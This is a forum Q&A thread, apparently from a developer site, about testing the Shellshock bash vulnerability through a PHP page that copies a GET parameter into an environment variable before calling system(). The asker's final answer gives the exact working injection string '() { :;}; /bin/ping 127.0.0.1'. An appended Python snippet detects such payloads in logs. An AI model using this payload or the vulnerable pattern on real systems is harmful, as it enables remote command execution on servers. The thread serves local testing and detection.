
I have been trying to test the Shellshock vulnerability on PHP, similar to this answer. I am running an Apache server with PHP running as mod_php. The PHP version is 5.3.10.

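I have a PHP file (phptest.php):

<?php

  // Test page: copies a request parameter into the process environment.
  function getLang() 
  { 
    $lang = ""; // default, so an undefined variable is never returned
    if (isset($_GET["lang"]) && !empty($_GET["lang"])) 
    { 
      $lang = $_GET["lang"]; 
    } 
    return $lang; 
  } 
  $language = getLang(); 
  // Unvalidated request input becomes an environment variable.
  putenv("LANGUAGE=$language");

  // system() runs the command through the system shell, which inherits LANGUAGE.
  system("env | grep LANGUAGE");

 ?>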

I tried to access the page via the browser as follows:

localhost/phptest.php?lang=(){:;}; /bin/ping http://localhost

In the linked question, the wget is to the dev's IP, but I just decided to do a ping to see if I can test it.

The browser shows the output as follows:

LANGUAGE=(){:;}; /bin/ping http://localhost 

I tried to monitor the ping using the following (from this question):

 sudo tcpdump -i lo icmp and icmp[icmptype]=icmp-echo

I didn't see any request. Can someone tell me what I need to correct in my test?

Jake

2 Answers

Assuming that this injection basically works:

localhost/phptest.php?lang=(){:;}; /bin/ping http://localhost

Your problem is related to the command you are trying to inject. Ping accepts a hostname as a parameter, but you injected http://localhost, which is a URL and can't be accepted by the ping command. It must be ping localhost instead of ping http://localhost.

davidb

I figured out the problem. Changing to /bin/ping 127.0.0.1 did help, but there was another subtle change to be made.

There needs to be one space between ) & {, and another space between { & :. The revised request was:

localhost/phptest.php?lang=() { :;}; /bin/ping 127.0.0.1

Source for answer was this link.

Jake
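An added example, not part of the original posts: a log-side check that URL-decodes query parameters and separates values unpatched bash would import as a function definition (they begin with exactly `() {`) from near-miss probes such as the first request in the question. The function names and the sample request lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Unpatched bash imported an environment value as a function definition
# only when it began with exactly these four bytes.
BASH_FUNC_PREFIX = "() {"
# Looser pattern: probes with missing or extra whitespace, which bash
# would not import but which are still worth alerting on.
PROBE_RE = re.compile(r"^\s*\(\s*\)\s*\{")


def classify_value(value):
    """Classify one decoded parameter value."""
    if value.startswith(BASH_FUNC_PREFIX):
        return "function-definition"
    if PROBE_RE.match(value):
        return "malformed-probe"
    return "clean"


def scan_request(target):
    """Return [(param, verdict)] for each suspicious query parameter."""
    findings = []
    # parse_qsl percent-decodes values and turns '+' into a space.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        verdict = classify_value(value)
        if verdict != "clean":
            findings.append((name, verdict))
    return findings


# Constructed request targets, as they might appear in an access log.
SAMPLES = [
    "/phptest.php?lang=en",
    "/phptest.php?lang=(){:;};%20/bin/ping%20http://localhost",
    "/phptest.php?lang=%28%29%20%7B%20%3A%3B%7D%3B%20/bin/ping%20127.0.0.1",
    "/phptest.php?lang=()+{+:;};+/bin/ping+127.0.0.1",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(scan_request(target), target)
```

Matching must happen on the decoded value, since the same prefix can arrive percent-encoded or with `+` standing in for the spaces.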